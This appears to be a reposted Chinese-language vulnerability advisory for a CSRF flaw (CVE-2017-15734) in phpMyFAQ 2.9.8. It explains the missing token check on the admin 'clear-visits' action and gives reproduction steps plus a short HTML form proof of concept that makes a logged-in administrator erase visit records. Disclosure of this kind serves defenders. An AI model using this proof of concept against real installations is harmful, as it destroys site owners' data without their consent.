phpMyFAQ 2.9.8 CSRF漏洞分析与利用详解

本文详细分析了phpMyFAQ 2.9.8版本中存在的跨站请求伪造(CSRF)漏洞(CVE-2017-15734)。该漏洞存在于后台统计功能中,攻击者可诱骗已认证管理员执行非预期的清除访问记录操作,文章提供了漏洞复现步骤和概念验证代码。

phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)

漏洞标题:phpMyFAQ 2.9.8 - 跨站请求伪造(CSRF)

发布日期:2024-10-26

漏洞作者:CodeSecLab

供应商主页:https://github.com/thorsten/phpMyFAQ

软件链接:https://github.com/thorsten/phpMyFAQ

版本:2.9.8

测试平台:Ubuntu Windows

CVE:CVE-2017-15734

漏洞概念验证(PoC): 访问 http://phpmyfaq/admin/index.php?action=clear-visits 复现步骤:在已登录状态下,另开一个浏览器窗口访问该链接。

技术细节: { “补丁前的保护机制”: “位于stat.main.php文件中的’clear-visits’操作未实施CSRF令牌验证,允许请求在不验证来源真实性的情况下执行。”, “文件导航链”: “公开访问入口URL: http://phpmyfaq/admin/index.php -> 漏洞文件: phpmyfaq/admin/stat.main.php”, “执行路径限制”: “用户必须经过身份验证并拥有适当的权限才能访问’clear-visits’操作。导航到漏洞文件依赖于admin index.php文件中的’action’参数,该参数必须设置为’clear-visits’。”, “请求参数”: “action=clear-visits”, “请求方法”: “GET”, “请求URL”: “http://phpmyfaq/admin/index.php?action=clear-visits”, “最终PoC代码”: “\n \n <form action="http://phpmyfaq/admin/index.php?action=clear-visits" method="GET">\n <input type="submit" value="提交请求">\n \n \n \n” }

[请替换为您自己的域名]

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计